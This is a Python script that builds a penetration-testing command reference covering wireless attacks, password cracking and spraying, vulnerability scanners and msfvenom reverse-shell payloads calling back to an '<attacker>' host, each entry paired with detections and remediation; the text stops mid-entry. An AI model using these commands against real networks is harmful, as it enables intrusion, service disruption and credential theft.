#!/usr/bin/env python3
"""Batch 9 — wireless, password, vuln_assessment, exploitation expansion (50 commands)."""
import json
from pathlib import Path
OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"

def e(id,tool,cat,phase,os,cmd,name,desc,args,output,use_case,prereqs,mitre,tactic,detections,remediation,mistakes,alts,refs,tags):
    return {"id":id,"tool":tool,"category":cat,"phase":phase,"os":os,"command":cmd,"name":name,"description":desc,"arguments":args,"expected_output":output,"use_case":use_case,"prerequisites":prereqs,"mitre_mapping":mitre,"mitre_tactic":tactic,"detections":detections,"remediation":remediation,"common_mistakes":mistakes,"alternatives":alts,"references":refs,"tags":tags}

L=["linux"];LW=["linux","windows"];LWM=["linux","windows","macos"];W=["windows"]

# ===================== WIRELESS (15) =====================
WIRELESS9=[
e("aircrack-pmkid","hcxdumptool","wireless",4,L,
"hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1 --filterlist_ap=<bssid> --filtermode=2",
"PMKID Capture (Clientless WPA Attack)","Captures PMKID from AP without needing a connected client — faster than handshake capture.",
{"--enable_status=1":"Show status","-o":"Output file","--filterlist_ap":"Target BSSID"},
"[FOUND PMKID] BSSID: AA:BB:CC:DD:EE:FF",
"Attack WPA2 networks without waiting for client handshake — works on most modern APs.",
["Monitor mode adapter","hcxdumptool installed"],["T1040"],"Credential Access",
["Monitor mode activity","Unusual management frames"],
["Use WPA3","Disable PMKID in AP firmware"],
["AP doesn't support PMKID"],["hcxtools","aircrack-ng"],
["https://hashcat.net/forum/thread-7717.html"],
["pmkid","wpa2","clientless","wireless","hashcat"]),
e("airgeddon-all","airgeddon","wireless",4,L,
"bash airgeddon.sh",
"Airgeddon (All-in-One Wireless)","Menu-driven wireless attack framework — WPA/WPA2 cracking, evil twin, DoS, WPS attacks.",
{},"[*] Select attack: 1) Handshake 2) PMKID 3) Evil Twin 4) WPS",
"All-in-one wireless testing when you need multiple attack types.",
["Wireless adapter","aircrack-ng suite"],["T1557"],"Credential Access",
["Monitor mode","Deauth frames"],["WPA3","802.1X","WIDS"],
["Wrong adapter selected"],["wifite","fluxion"],
["https://github.com/v1s1t0r1sh3r3/airgeddon"],
["airgeddon","wireless","all-in-one","menu","framework"]),
e("kismet-passive","kismet","wireless",1,L,
"kismet -c wlan0",
"Kismet Passive Wireless Recon","Passively monitors all wireless traffic — discovers networks, clients, and probes without transmitting.",
{"-c wlan0":"Capture source"},"SSID: CorpNet (WPA2) BSSID: AA:BB:CC:DD:EE:FF Ch:6\nClient: 11:22:33:44:55:66 probing for 'HomeWiFi'",
"Passive wireless reconnaissance — completely undetectable.",
["Wireless adapter"],["T1040"],"Discovery",
["Cannot detect passive monitoring"],["N/A — passive only"],
["Missing packets due to channel hopping"],["airodump-ng","wireshark"],
["https://www.kismetwireless.net"],
["kismet","passive","wireless","recon","undetectable"]),
e("reaver-wps","reaver","wireless",4,L,
"reaver -i wlan0mon -b <bssid> -vv -K 1",
"WPS Pixie Dust Attack","Exploits WPS implementation flaws to recover WPA password in seconds (Pixie Dust).",
{"-b":"Target BSSID","-K 1":"Pixie Dust attack","-vv":"Verbose"},
"[+] WPS pin: 12345670\n[+] WPA PSK: MySecretPassword123",
"Crack WPA via WPS vulnerability — works in seconds if AP is vulnerable.",
["Monitor mode","WPS enabled on target"],["T1110"],"Credential Access",
["WPS authentication attempts"],["Disable WPS","Use WPS lockout"],
["WPS locked out","Not vulnerable to Pixie Dust"],["bully","oneshot"],
["https://github.com/t6x/reaver-wps-fork-t6x"],
["wps","pixie-dust","reaver","wireless","pin"]),
e("mdk4-deauth","mdk4","wireless",4,L,
"mdk4 wlan0mon d -B <bssid>",
"MDK4 Deauthentication Flood","Sends mass deauthentication frames — more aggressive than aireplay-ng.",
{"d":"Deauth mode","-B":"Target BSSID"},
"Sending deauth frames to AA:BB:CC:DD:EE:FF...\nClients disconnecting...",
"Force all clients off a network for evil twin or handshake capture.",
["Monitor mode adapter"],["T1499"],"Impact",
["Mass deauth frames","WIDS alerts"],["802.11w (PMF)","WIDS"],
["PMF enabled (protected management frames)"],["aireplay-ng --deauth"],
["https://github.com/aircrack-ng/mdk4"],
["deauth","dos","wireless","flood","disconnect"]),
e("eaphammer-enterprise","eaphammer","wireless",4,L,
"eaphammer --bssid <bssid> --essid CorpWiFi --channel 6 --auth wpa-eap --creds",
"EAPHammer (Enterprise WiFi Attack)","Creates rogue AP for WPA-Enterprise — captures RADIUS credentials (MSCHAPv2 hashes).",
{"--auth wpa-eap":"Enterprise mode","--creds":"Capture credentials"},
"[*] Rogue AP active: CorpWiFi\n[+] Captured: CORP\\jsmith:$MSCHAPv2$...",
"Attack WPA-Enterprise networks by capturing RADIUS authentication hashes.",
["Two wireless adapters","Hostapd-mana"],["T1557"],"Credential Access",
["Duplicate SSID","Rogue RADIUS server"],["Certificate pinning","EAP-TLS","WIDS"],
["Clients verify server certificate"],["hostapd-mana","wpa_sycophant"],
["https://github.com/s0lst1c3/eaphammer"],
["enterprise","wpa-eap","radius","mschapv2","rogue-ap"]),
e("wifi-pumpkin","wifi-pumpkin3","wireless",4,L,
"wp3 --essid FreeWiFi --proxy captiveflask",
"WiFi-Pumpkin3 (Rogue AP Framework)","Creates rogue access point with captive portal, DNS spoofing, and traffic interception.",
{"--essid":"Network name","--proxy captiveflask":"Captive portal proxy"},
"[*] AP started: FreeWiFi\n[*] Client connected: 192.168.1.5\n[*] Credentials captured via portal",
"Full rogue AP framework with modular plugins for credential capture.",
["Two wireless adapters"],["T1557"],"Credential Access",
["Rogue AP","Captive portal","DNS spoofing"],["Don't connect to open WiFi","VPN","WIDS"],
["No clients connect"],["wifiphisher","fluxion"],
["https://github.com/P0cL4bs/wifipumpkin3"],
["rogue-ap","captive-portal","mitm","framework","wireless"]),
e("hostapd-mana","hostapd-mana","wireless",4,L,
"hostapd-mana /etc/hostapd-mana/hostapd-mana.conf",
"Hostapd-Mana (Karma Attack)","Modified hostapd that responds to all probe requests — captures clients looking for any network.",
{},"[*] Responding to probe for 'HomeWiFi' from 11:22:33:44:55:66\n[*] Client associated",
"Capture clients by responding to their probe requests for remembered networks.",
["Wireless adapter","hostapd-mana config"],["T1557"],"Credential Access",
["AP responding to all probes","Unusual SSID patterns"],["Forget saved networks","Use 802.1X"],
["Modern devices randomize probes"],["wifi-pumpkin3","eaphammer"],
["https://github.com/sensepost/hostapd-mana"],
["karma","probe","mana","rogue-ap","wireless"]),
e("bettercap-wifi-deauth","bettercap","wireless",4,L,
"bettercap -iface wlan0mon -eval 'wifi.recon on; wifi.deauth <bssid>'",
"Bettercap WiFi Deauth","Uses bettercap for targeted WiFi deauthentication — integrated with other MITM capabilities.",
{"wifi.recon on":"Start WiFi recon","wifi.deauth":"Deauth target"},
"[*] WiFi recon active\n[*] Deauthing clients from CorpNet",
"Deauth + recon in one tool — useful when combining WiFi and network attacks.",
["Monitor mode adapter","bettercap"],["T1499"],"Impact",
["Deauth frames","Monitor mode activity"],["802.11w PMF","WIDS"],
["PMF enabled"],["aireplay-ng","mdk4"],
["https://www.bettercap.org/modules/wifi/"],
["bettercap","deauth","wifi","recon","combined"]),
e("wifite2-auto","wifite","wireless",4,L,
"wifite --kill -5ghz",
"Wifite2 Automated WiFi Cracking","Automated wireless auditing — tries WPS, PMKID, handshake capture, and cracking sequentially.",
{"--kill":"Kill interfering processes","-5ghz":"Include 5GHz networks"},
"[+] Target: CorpNet (WPA2)\n[+] Trying PMKID... Success!\n[+] Cracking with wordlist...\n[+] KEY: Password123",
"Fully automated WiFi cracking — tries all methods sequentially.",
["Monitor mode adapter","Wordlist"],["T1110"],"Credential Access",
["Monitor mode","Multiple attack attempts"],["WPA3","Strong passwords","Disable WPS"],
["All methods fail (strong password)"],["airgeddon","manual aircrack-ng"],
["https://github.com/derv82/wifite2"],
["wifite","automated","cracking","wpa2","all-methods"]),
e("krack-test","krackattacks-scripts","wireless",4,L,
"python3 krack_all_zero_tk.py wlan0",
"KRACK Attack Test (Key Reinstallation)","Tests if WPA2 clients are vulnerable to key reinstallation attacks (CVE-2017-13077).",
{"wlan0":"Interface in monitor mode"},
"[*] Testing client 11:22:33:44:55:66\n[!] VULNERABLE: Client reinstalled all-zero key",
"Test WPA2 clients for KRACK vulnerability — allows traffic decryption.",
["Monitor mode","Specific client connected"],["T1040"],"Credential Access",
["Unusual 4-way handshake retransmissions"],["Patch clients","Use WPA3"],
["Client already patched"],["vanhoefm/krackattacks-scripts"],
["https://www.krackattacks.com"],
["krack","wpa2","key-reinstallation","cve","vulnerability"]),
e("dragonblood-wpa3","dragonblood","wireless",4,L,
"python3 dragonslayer.py -i wlan0 -t <bssid> -s CorpNet",
"WPA3 Dragonblood Attack","Tests WPA3 SAE (Dragonfly) handshake for side-channel and downgrade vulnerabilities.",
{"-i":"Interface","-t":"Target BSSID","-s":"SSID"},
"[*] Testing SAE handshake...\n[!] Timing side-channel detected\n[!] Downgrade to WPA2 possible",
"Test WPA3 implementations for Dragonblood vulnerabilities.",
["WPA3 network","dragonblood tools"],["T1040"],"Credential Access",
["Unusual SAE handshake patterns"],["Update AP firmware","Disable WPA2 fallback"],
["AP fully patched"],["manual SAE testing"],
["https://wpa3.mathyvanhoef.com"],
["wpa3","dragonblood","sae","downgrade","side-channel"]),
e("wifi-deauth-scapy","scapy","wireless",4,L,
"python3 -c \"from scapy.all import *; sendp(RadioTap()/Dot11(addr1='FF:FF:FF:FF:FF:FF',addr2='<bssid>',addr3='<bssid>')/Dot11Deauth(),iface='wlan0mon',count=100)\"",
"Custom Deauth with Scapy","Craft custom deauthentication frames with Scapy — full control over frame parameters.",
{"addr1":"Destination (broadcast)","addr2":"Source (AP)","count":"Number of frames"},
"Sent 100 packets.",
"Custom deauth when standard tools are detected — modify frame parameters to evade WIDS.",
["Scapy","Monitor mode","Python"],["T1499"],"Impact",
["Deauth frames","Unusual frame parameters"],["802.11w PMF","WIDS with custom signatures"],
["PMF enabled"],["aireplay-ng","mdk4"],
["https://scapy.readthedocs.io"],
["scapy","custom","deauth","crafting","python"]),
]

# ===================== PASSWORD ATTACKS (15) =====================
PASS9=[
e("hashcat-rules","hashcat","password_attacks",4,LWM,
"hashcat -m 1000 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule",
"Hashcat Rule-Based Attack","Applies transformation rules to wordlist — generates variations (l33t, append numbers, etc.).",
{"-m 1000":"NTLM hash type","-r":"Rule file","best64.rule":"Top 64 transformations"},
"Session: hashcat\nSpeed: 15.2 GH/s\nRecovered: 45/100 (45%)\nadmin:Password1!",
"Crack passwords by applying common transformations to dictionary words.",
["Hash file","Wordlist","GPU recommended"],["T1110.002"],"Credential Access",
["N/A — offline attack"],["Strong password policy","Salted hashes","bcrypt/argon2"],
["Wrong hash type selected"],["john --rules","custom rules"],
["https://hashcat.net/wiki/doku.php?id=rule_based_attack"],
["hashcat","rules","transformation","cracking","gpu"]),
e("hashcat-combinator","hashcat","password_attacks",4,LWM,
"hashcat -m 0 hashes.txt -a 1 wordlist1.txt wordlist2.txt",
"Hashcat Combinator Attack","Combines words from two dictionaries — catches passwords like 'SummerDragon' or 'Blue2024'.",
{"-a 1":"Combinator attack mode"},
"Recovered: admin:SummerDragon\nRecovered: jsmith:Blue2024",
"Crack passwords that combine two common words.",
["Two wordlists","Hash file"],["T1110.002"],"Credential Access",
["N/A — offline"],["Minimum password length 15+","Passphrase policies"],
["Keyspace too large"],["prince attack","token attack"],
["https://hashcat.net/wiki/doku.php?id=combinator_attack"],
["combinator","two-words","hashcat","dictionary","combined"]),
e("hashcat-mask","hashcat","password_attacks",4,LWM,
"hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?d?d?s",
"Hashcat Mask/Brute-Force","Brute-force with pattern mask — target specific password structures.",
{"-a 3":"Mask attack","?u":"Uppercase","?l":"Lowercase","?d":"Digit","?s":"Special"},
"Speed: 95.2 GH/s\nRecovered: admin:Hello12!\njsmith:World99#",
"Crack passwords matching known patterns (e.g., Ullllldd! = Word + numbers + special).",
["Hash file","GPU","Known password pattern"],["T1110.001"],"Credential Access",
["N/A — offline"],["No predictable patterns","Long passwords"],
["Mask too broad (huge keyspace)"],["john --mask","crunch | hashcat"],
["https://hashcat.net/wiki/doku.php?id=mask_attack"],
["mask","brute-force","pattern","hashcat","structure"]),
e("john-zip","john","password_attacks",4,LWM,
"zip2john protected.zip > zip_hash.txt && john zip_hash.txt --wordlist=rockyou.txt",
"Crack ZIP Password","Extracts hash from password-protected ZIP and cracks it.",
{"zip2john":"Extract hash from ZIP","--wordlist":"Dictionary to use"},
"protected.zip:$pkzip$...\nLoaded 1 password hash\npassword123 (protected.zip)",
"Crack password-protected ZIP files found during engagement.",
["Protected ZIP file","john installed"],["T1110.002"],"Credential Access",
["N/A — offline"],["Strong ZIP passwords","Use 7z with AES-256"],
["AES-256 encrypted (very slow)"],["hashcat -m 17200","fcrackzip"],
["https://www.openwall.com/john/"],
["zip","archive","password","cracking","john"]),
e("john-ssh-key","john","password_attacks",4,LWM,
"ssh2john id_rsa > ssh_hash.txt && john ssh_hash.txt --wordlist=rockyou.txt",
"Crack SSH Private Key Passphrase","Extracts and cracks the passphrase protecting an SSH private key.",
{"ssh2john":"Extract passphrase hash"},
"id_rsa:$sshng$...\npassphrase123 (id_rsa)",
"Crack SSH key passphrases from stolen private keys.",
["Encrypted SSH private key","john installed"],["T1110.002"],"Credential Access",
["N/A — offline"],["Strong passphrases","Hardware keys"],
["Key uses modern KDF (very slow)"],["hashcat -m 22921"],
["https://www.openwall.com/john/"],
["ssh","private-key","passphrase","cracking","john"]),
e("responder-capture","responder","password_attacks",4,L,
"responder -I eth0 -wrfv",
"Responder (LLMNR/NBT-NS Poisoning)","Poisons LLMNR/NBT-NS/mDNS to capture NTLMv2 hashes from Windows clients.",
{"-I":"Interface","-w":"WPAD proxy","-r":"Answer NetBIOS wredir","-f":"Fingerprint","-v":"Verbose"},
"[+] Listening for events...\n[*] [LLMNR] Poisoned answer for fileserver\n[+] NTLMv2 Hash: jsmith::CORP:abc123...",
"Capture NTLMv2 hashes on internal networks — most effective internal attack.",
["Internal network access","Linux machine"],["T1557.001"],"Credential Access",
["LLMNR/NBT-NS responses from non-server","Unusual WPAD responses"],
["Disable LLMNR","Disable NBT-NS","Require SMB signing"],
["LLMNR already disabled"],["Inveigh (Windows)","mitm6"],
["https://github.com/lgandx/Responder"],
["responder","llmnr","nbt-ns","ntlmv2","poisoning","internal"]),
e("ntlmrelayx-relay","impacket","password_attacks",4,L,
"ntlmrelayx.py -tf targets.txt -smb2support -i",
"NTLM Relay Attack","Relays captured NTLM authentication to other targets — no cracking needed.",
{"-tf":"Target file","-smb2support":"SMB2 support","-i":"Interactive shell"},
"[*] Servers started\n[*] HTTPD: Received connection from 10.0.0.5\n[*] Relaying to 10.0.0.10\n[*] Got interactive shell on 10.0.0.10",
"Relay NTLM auth to gain access without cracking — works when SMB signing is disabled.",
["Responder running","Targets without SMB signing"],["T1557.001"],"Credential Access",
["Authentication from unexpected sources","Relay patterns"],
["Enable SMB signing","Require EPA","Disable NTLM"],
["SMB signing enforced on all targets"],["MultiRelay","PetitPotam + relay"],
["https://github.com/fortra/impacket"],
["relay","ntlm","smb","impacket","no-cracking"]),
e("kerbrute-enum","kerbrute","password_attacks",4,L,
"kerbrute userenum --dc <dc_ip> -d corp.local users.txt",
"Kerberos User Enumeration","Enumerates valid domain users via Kerberos pre-authentication — no lockout.",
{"userenum":"Enumeration mode","--dc":"Domain controller","-d":"Domain"},
"[+] VALID: jsmith@corp.local\n[+] VALID: admin@corp.local\n[-] INVALID: fakeuser@corp.local",
"Enumerate valid AD users without triggering account lockout.",
["Domain controller accessible","Username list"],["T1087.002"],"Discovery",
["Kerberos pre-auth requests from single source"],
["Monitor Kerberos traffic patterns","Rate limiting"],
["Kerberos not accessible"],["nmap krb5-enum-users","enum4linux"],
["https://github.com/ropnop/kerbrute"],
["kerberos","enumeration","users","active-directory","no-lockout"]),
e("kerbrute-spray","kerbrute","password_attacks",4,L,
"kerbrute passwordspray --dc <dc_ip> -d corp.local users.txt 'Summer2024!'",
"Kerberos Password Spray","Sprays one password against many users via Kerberos — avoids lockout.",
{"passwordspray":"Spray mode"},
"[+] VALID: jsmith@corp.local:Summer2024!\n[+] VALID: helpdesk@corp.local:Summer2024!",
"Test common passwords against all domain users without lockout.",
["Valid user list","Domain controller"],["T1110.003"],"Credential Access",
["Multiple Kerberos auth attempts","Event 4771"],
["Account lockout policy","Ban common passwords"],
["Lockout threshold too low"],["crackmapexec smb --pass-pol first"],
["https://github.com/ropnop/kerbrute"],
["kerberos","spray","password","active-directory","lockout-safe"]),
e("hydra-rdp","hydra","password_attacks",4,L,
"hydra -l admin -P passwords.txt rdp://<target> -t 1 -W 5",
"Hydra RDP Brute Force","Brute-forces RDP login — slow and careful to avoid lockout.",
{"-l":"Username","-P":"Password list","-t 1":"1 thread","-W 5":"5 second wait"},
"[3389][rdp] host: 10.0.0.5 login: admin password: Welcome1!",
"Brute-force RDP when other methods fail — very slow but effective.",
["RDP accessible","Username known"],["T1110.001"],"Credential Access",
["Multiple failed RDP logins (Event 4625)"],["Account lockout","NLA","MFA for RDP"],
["Account locks out","NLA blocks attempts"],["crowbar","ncrack"],
["https://github.com/vanhauser-thc/thc-hydra"],
["rdp","brute-force","hydra","remote-desktop","slow"]),
e("sprayhound-smart","sprayhound","password_attacks",4,L,
"sprayhound -U users.txt -p 'Winter2024!' -d corp.local -dc <dc_ip> --safe",
"SprayHound (Smart Password Spray)","Password spraying that checks lockout policy first — automatically respects thresholds.",
{"--safe":"Check lockout policy first","-d":"Domain"},
"[*] Lockout threshold: 5 attempts / 30 min\n[*] Spraying safely...\n[+] jsmith:Winter2024!",
"Safe password spraying that won't lock accounts — checks policy first.",
["Domain credentials or anonymous access to read policy"],["T1110.003"],"Credential Access",
["Password spray pattern in logs"],["Smart lockout","Azure AD protection"],
["Can't read lockout policy"],["kerbrute","crackmapexec --jitter"],
["https://github.com/Hackndo/sprayhound"],
["spray","smart","lockout-safe","active-directory","policy-aware"]),
e("hashcat-potfile","hashcat","password_attacks",4,LWM,
"hashcat -m 1000 hashes.txt --show",
"Hashcat Show Cracked (Potfile)","Displays previously cracked hashes from the potfile — no re-cracking needed.",
{"--show":"Display cracked from potfile"},
"fc525c9683e8fe067095ba2ddc971889:Password1!\n31d6cfe0d16ae931b73c59d7e0c089c0:(empty)",
"Check which hashes were already cracked in previous sessions.",
["Previous hashcat session","Potfile exists"],["T1110.002"],"Credential Access",
["N/A — offline"],["N/A"],["Potfile deleted"],["john --show"],
["https://hashcat.net/wiki/doku.php?id=frequently_asked_questions#potfile"],
["potfile","show","cracked","hashcat","results"]),
e("cewl-wordlist","cewl","password_attacks",1,LWM,
"cewl -d 3 -m 6 -w custom_wordlist.txt http://<target>/ --with-numbers",
"CeWL Custom Wordlist Generator","Spiders a website to build a custom wordlist from page content — catches org-specific passwords.",
{"-d 3":"Depth 3","-m 6":"Min word length 6","--with-numbers":"Include words with numbers"},
"CeWL 6.0\nWords found: 847\nWritten to custom_wordlist.txt",
"Generate target-specific wordlist — catches passwords based on company/product names.",
["Target website"],["T1589"],"Reconnaissance",
["Web spidering activity"],["Don't use company-related passwords"],
["Site has little text content"],["crunch","cupp","mentalist"],
["https://github.com/digininja/CeWL"],
["wordlist","custom","spider","website","targeted"]),
e("cupp-profiling","cupp","password_attacks",1,L,
"cupp -i",
"CUPP (Common User Passwords Profiler)","Generates targeted wordlist based on personal information (name, DOB, pet, etc.).",
{"-i":"Interactive mode (asks questions)"},
"[+] Enter first name: John\n[+] Enter last name: Smith\n[+] Birth date: 1990\n...\n[+] Generated 14,344 passwords → john_smith.txt",
"Create targeted wordlist from OSINT about a specific person.",
["Personal information about target"],["T1589.001"],"Reconnaissance",
["N/A — offline generation"],["Don't use personal info in passwords"],
["Insufficient personal info"],["mentalist","crunch","custom rules"],
["https://github.com/Mebus/cupp"],
["profiling","personal","wordlist","osint","targeted"]),
]

# ===================== VULNERABILITY ASSESSMENT (10) =====================
VULN9=[
e("nessus-scan","nessus","vulnerability_assessment",3,LWM,
"# Nessus Web UI: https://localhost:8834\n# New Scan → Advanced Scan → Set targets → Launch",
"Nessus Vulnerability Scan","Industry-standard vulnerability scanner — comprehensive checks with low false positives.",
{},"CRITICAL: MS17-010 (EternalBlue) - 10.0.0.5\nHIGH: Apache Struts RCE - 10.0.0.10\nMEDIUM: SSL/TLS weak ciphers - 10.0.0.15",
"Comprehensive vulnerability assessment — gold standard for enterprise scanning.",
["Nessus installed","Network access to targets"],["T1595"],"Reconnaissance",
["Scanning traffic","Authentication attempts"],["Patch vulnerabilities","Harden configurations"],
["Credentialed scan needs valid creds"],["OpenVAS","Qualys","Nexpose"],
["https://www.tenable.com/products/nessus"],
["nessus","vulnerability","scanner","enterprise","comprehensive"]),
e("openvas-scan","openvas","vulnerability_assessment",3,L,
"gvm-cli socket --xml '<create_task><name>Full Scan</name><target id=\"...\"/><config id=\"...\"/></create_task>'",
"OpenVAS/GVM Vulnerability Scan","Free open-source vulnerability scanner — alternative to Nessus with 50,000+ NVTs.",
{},"CRITICAL: CVE-2021-44228 Log4Shell\nHIGH: Default credentials on admin panel\nMEDIUM: Missing security headers",
"Free comprehensive vulnerability scanning — good for labs and small engagements.",
["GVM/OpenVAS installed","Feeds updated"],["T1595"],"Reconnaissance",
["Scanning traffic"],["Patch systems","Update configurations"],
["Feeds not updated (misses new vulns)"],["Nessus","Nexpose","nuclei"],
["https://www.greenbone.net/en/community-edition/"],
["openvas","gvm","free","vulnerability","scanner"]),
e("nuclei-custom","nuclei","vulnerability_assessment",3,L,
"nuclei -u http://<target> -t /custom-templates/ -severity critical,high -rate-limit 50",
"Nuclei Custom Template Scan","Runs custom nuclei templates — write your own checks for specific vulnerabilities.",
{"-t":"Template directory","-severity":"Filter severity","--rate-limit":"Requests per second"},
"[critical] [custom-rce] http://target/api/exec\n[high] [custom-sqli] http://target/search?q=",
"Run custom vulnerability checks tailored to the target application.",
["nuclei installed","Custom templates written"],["T1595"],"Reconnaissance",
["HTTP requests matching template patterns"],["Fix identified vulnerabilities"],
["Templates have false positives"],["burp scanner","custom scripts"],
["https://github.com/projectdiscovery/nuclei"],
["nuclei","custom","templates","targeted","scanning"]),
e("nikto-web","nikto","vulnerability_assessment",3,LWM,
"nikto -h http://<target> -Tuning 123bde -output report.html -Format htm",
"Nikto Web Server Scanner","Scans web servers for dangerous files, outdated software, and misconfigurations.",
{"-h":"Target host","-Tuning":"Test types","-output":"Report file"},
"+ Server: Apache/2.4.49\n+ /admin/: Directory indexing found\n+ /backup.sql: Database backup exposed\n+ OSVDB-3092: /.git/: Git repository found",
"Quick web server assessment — finds common misconfigurations and exposed files.",
["Web server accessible"],["T1595"],"Reconnaissance",
["Rapid HTTP requests to known paths"],["Remove exposed files","Disable directory listing"],
["Many false positives"],["nuclei","dirsearch","feroxbuster"],
["https://github.com/sullo/nikto"],
["nikto","web","scanner","misconfig","files"]),
e("testssl-audit","testssl.sh","vulnerability_assessment",3,L,
"testssl.sh --severity HIGH --sneaky https://<target>",
"TLS/SSL Configuration Audit","Comprehensive TLS/SSL testing — checks protocols, ciphers, vulnerabilities (BEAST, POODLE, Heartbleed).",
{"--severity HIGH":"Show only high+ findings","--sneaky":"Slower, less detectable"},
"CRITICAL: Heartbleed (CVE-2014-0160) - VULNERABLE\nHIGH: POODLE (SSLv3) - VULNERABLE\nHIGH: Weak cipher: RC4",
"Audit TLS configuration for vulnerabilities and weak ciphers.",
["HTTPS target"],["T1595"],"Reconnaissance",
["TLS connection attempts with various parameters"],["Update TLS config","Disable weak ciphers"],
["Can't connect (firewall)"],["sslyze","nmap --script ssl-enum-ciphers"],
["https://github.com/drwetter/testssl.sh"],
["tls","ssl","audit","ciphers","heartbleed","poodle"]),
e("wpscan-wordpress","wpscan","vulnerability_assessment",3,L,
"wpscan --url http://<target> --enumerate vp,vt,u --plugins-detection aggressive",
"WPScan WordPress Audit","Comprehensive WordPress vulnerability scanner — checks plugins, themes, users.",
{"--enumerate vp,vt,u":"Vulnerable plugins, themes, users","--plugins-detection aggressive":"Check all plugins"},
"[+] WordPress 6.1.1\n[!] Plugin: contact-form-7 (v5.1.3) - SQLi (CVE-2023-1234)\n[+] Users: admin, editor",
"Full WordPress security audit — finds vulnerable plugins and exposed users.",
["WordPress site"],["T1595"],"Reconnaissance",
["Aggressive plugin enumeration requests"],["Update WordPress and plugins","Hide user enumeration"],
["Not WordPress"],["nuclei -t technologies/wordpress"],
["https://github.com/wpscanteam/wpscan"],
["wordpress","wpscan","plugins","themes","cms"]),
e("lynis-audit","lynis","vulnerability_assessment",3,L,
"lynis audit system --quick",
"Lynis System Hardening Audit","Audits Linux system security — checks configuration, permissions, services, firewall.",
{"audit system":"Full system audit","--quick":"Skip user interaction"},
"[WARNING] Found: /etc/shadow readable by group\n[SUGGESTION] Enable ASLR\n[SUGGESTION] Install fail2ban\nHardening index: 62/100",
"Audit Linux system hardening — useful for privilege escalation research.",
["Root access on Linux system"],["T1082"],"Discovery",
["N/A — local audit"],["Follow hardening suggestions"],
["Not running as root (limited checks)"],["linpeas","linux-exploit-suggester"],
["https://github.com/CISOfy/lynis"],
["lynis","hardening","audit","linux","configuration"]),
e("scout-suite-cloud","scoutsuite","vulnerability_assessment",3,L,
"scout --provider aws --report-dir ./report",
"ScoutSuite Multi-Cloud Audit","Audits AWS/Azure/GCP security configuration — finds misconfigurations across services.",
{"--provider":"Cloud provider","--report-dir":"Output directory"},
"[DANGER] S3 bucket 'logs' allows public access\n[WARNING] IAM user 'deploy' has no MFA\n[DANGER] Security group allows 0.0.0.0/0 on port 22",
"Multi-cloud security audit — comprehensive check of cloud configurations.",
["Cloud credentials configured"],["T1595"],"Reconnaissance",
["API calls from unusual source"],["Fix misconfigurations","Enable MFA"],
["Insufficient permissions"],["prowler","steampipe","cloudsploit"],
["https://github.com/nccgroup/ScoutSuite"],
["cloud","aws","azure","gcp","audit","misconfiguration"]),
e("dnsrecon-zone","dnsrecon","vulnerability_assessment",1,L,
"dnsrecon -d <domain> -t axfr,std,brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt",
"DNSRecon Comprehensive DNS Audit","Full DNS reconnaissance — zone transfer, standard records, brute-force subdomains.",
{"-t axfr,std,brt":"Zone transfer + standard + brute","-D":"Subdomain wordlist"},
"[*] Zone Transfer successful!\n[*] A admin.target.com 10.0.0.5\n[*] MX mail.target.com\n[*] TXT v=spf1 include:...",
"Comprehensive DNS enumeration — finds subdomains, mail servers, SPF records.",
["Target domain"],["T1590.002"],"Reconnaissance",
["DNS queries from single source","Zone transfer attempts"],
["Disable zone transfers","Use split-horizon DNS"],
["Zone transfer blocked (normal)"],["subfinder","amass","fierce"],
["https://github.com/darkoperator/dnsrecon"],
["dns","zone-transfer","subdomain","enumeration","recon"]),
e("sslyze-tls","sslyze","vulnerability_assessment",3,LWM,
"sslyze --regular <target>:443",
"SSLyze TLS Analysis","Fast TLS/SSL scanner — checks certificate, protocols, ciphers, and known vulnerabilities.",
{"--regular":"Standard scan suite"},
"Certificate: CN=target.com, expires 2025-01-01\nProtocols: TLSv1.2, TLSv1.3\nVulnerabilities: None detected\nWeak ciphers: RC4 (disabled)",
"Quick TLS assessment — faster than testssl.sh with Python API for automation.",
["HTTPS target accessible"],["T1595"],"Reconnaissance",
["TLS probing"],["Update TLS configuration"],
["Target not HTTPS"],["testssl.sh","nmap ssl-enum-ciphers"],
["https://github.com/nabla-c0d3/sslyze"],
["sslyze","tls","ssl","certificate","fast"]),
]

# ===================== EXPLOITATION (10) =====================
EXPLOIT9=[
e("msfvenom-windows","msfvenom","exploitation",4,LWM,
"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell.exe",
"MSFVenom Windows Payload","Generates Windows reverse shell executable — standard Meterpreter payload.",
{"-p":"Payload","-f exe":"EXE format","LHOST":"Attacker IP","LPORT":"Listening port"},
"[-] No platform was selected, choosing Msf::Module::Platform::Windows\nPayload size: 510 bytes\nSaved as: shell.exe",
"Generate Windows reverse shell for delivery via phishing or file upload.",
["Metasploit installed"],["T1059.001"],"Execution",
["AV signature detection","Unusual outbound connections"],
["AV/EDR","Application whitelisting","Network monitoring"],
["AV detects payload"],["msfvenom with encoders","custom C2"],
["https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html"],
["msfvenom","payload","windows","reverse-shell","exe"]),
e("msfvenom-linux","msfvenom","exploitation",4,LWM,
"msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f elf -o shell.elf",
"MSFVenom Linux Payload","Generates Linux reverse shell ELF binary.",
{"-p":"Payload","-f elf":"ELF format"},
"Payload size: 130 bytes\nSaved as: shell.elf",
"Generate Linux reverse shell for post-exploitation or initial access.",
["Metasploit installed"],["T1059.004"],"Execution",
["Unusual outbound connections","New binary execution"],
["File integrity monitoring","Network monitoring"],
["Target has no outbound connectivity"],["bash reverse shell","python reverse shell"],
["https://docs.metasploit.com"],
["msfvenom","linux","elf","reverse-shell","payload"]),
e("msfvenom-php","msfvenom","exploitation",4,LWM,
"msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw > shell.php",
"MSFVenom PHP Web Shell","Generates PHP reverse shell for upload to web servers.",
{"-p php/...":"PHP payload","-f raw":"Raw PHP code"},
"<?php /*...*/ eval(base64_decode('...')); ?>",
"Upload to web servers via file upload vulnerabilities.",
["File upload vulnerability","PHP execution on server"],["T1505.003"],"Persistence",
["PHP file creation","Outbound connections from web server"],
["Disable PHP execution in upload dirs","WAF"],
